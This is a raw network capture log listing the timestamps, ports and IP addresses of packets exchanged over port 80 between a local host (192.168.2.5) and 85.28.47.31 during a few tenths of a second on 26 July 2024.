Jul 26, 2024 20:09:04.481071949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.481190920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.481206894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.481219053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.481256008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.481286049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.495452881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.495470047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.495485067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.495501041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.495532036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.495532990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.495663881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.495678902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.495702028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.495726109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.500377893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.500394106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.500422001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.500449896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.500550032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.500566006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.500596046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.500626087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.505290985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.505357027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.505697966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.505717039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.505732059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.505748034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.505749941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.505770922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.505795002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.505795002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.510521889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.510607004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.512278080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.512295008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.512334108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.512362003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.512883902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.512943029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.517023087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.517040014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.517081976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.517111063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.517785072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.517802000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.517816067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.517834902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.517865896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.517865896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.521791935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.521811008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.521826982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.521853924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.521883011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.522510052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.522526979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.522567034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.522594929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.526513100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.526530027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.526573896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.526604891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.527302980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.527362108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.555646896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.555825949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.559757948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.559773922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.559818029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.559845924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.560395002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.560411930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.560425997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.560445070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.560473919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.564548969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.564569950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.564583063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.564608097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.564636946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.565124035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.565140963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.565170050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.565193892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.569297075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.569314003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.569343090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.569370031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.569835901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.569852114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.569864035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.569873095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.569892883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.569906950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.610717058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.610733986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.610748053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.610837936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.610863924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.610897064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.610897064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.610897064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.610944986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.615576982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615592957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615606070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615648031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.615675926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.615700006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615715981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615729094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.615750074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.615773916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.620547056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.620563984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.620608091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.620790005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.620851994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.620899916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.620961905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.625350952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.625366926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.625406027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.625436068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.625684977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.625700951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.625741005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.625766993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.630084991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630101919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630115986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630147934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.630192995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.630393028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630409002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630422115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.630449057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.630474091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.634808064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.634824038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.634839058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.634859085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.634886026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.635096073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.635112047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.635144949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.635170937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.639580011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.639596939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.639611959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.639626026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.639628887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.639641047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.639651060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.639679909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640028000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640043974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640057087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640073061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640078068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640085936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640101910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640113115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640134096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640161991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640892982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640909910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640923977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640938997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640940905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640954018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640963078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.640969992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.640999079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.641025066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.641772985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.641788960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.641803026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.641818047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.641823053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.641833067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.641854048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.641877890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.642954111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.642971039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.642986059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643004894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643023968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643033028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643038988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643054008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643066883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643488884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643505096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643520117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643523932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643534899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643543959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643549919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.643568993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.643594027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644314051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644342899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644366980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644728899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644745111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644758940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644763947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644774914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644782066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644788980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.644798040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644821882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.644844055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.645579100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645596027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645608902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645625114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645628929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.645639896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645648956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.645654917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645668983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.645678043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.645697117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.645726919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.647352934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.647367954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.647382975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.647397041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.647401094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.647422075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.647434950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.647463083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.648179054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648195028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648207903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648222923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648227930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.648238897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648247004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.648255110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.648278952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.648304939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649090052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649106979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649121046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649136066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649138927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649149895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649158955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649166107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649178028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649197102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649226904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649916887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649933100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649947882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649964094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649967909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.649977922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.649985075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.650002003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.650019884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656389952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656443119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656450033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656466007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656486988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656503916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656505108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656505108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656518936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656539917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656539917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656564951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656779051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656795025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656809092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656832933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656836987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656852961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656857014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656867981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.656877041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.656920910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.657629967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.657644987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.657691956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.657710075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.659595966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.659620047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.659635067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.659653902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.659751892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.659940004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.660000086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.661961079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.661977053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.661992073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662007093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662009954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.662022114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662033081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.662075996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.662906885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662924051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662946939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662955046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.662962914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662977934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.662982941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.662992954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663002014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.663007975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663031101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.663055897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.663881063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663897038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663912058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663925886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663932085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.663942099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663958073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.663963079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.663981915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664005995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664850950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664868116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664881945 CEST	80	49704	85.28.47.31	192.168.2.5
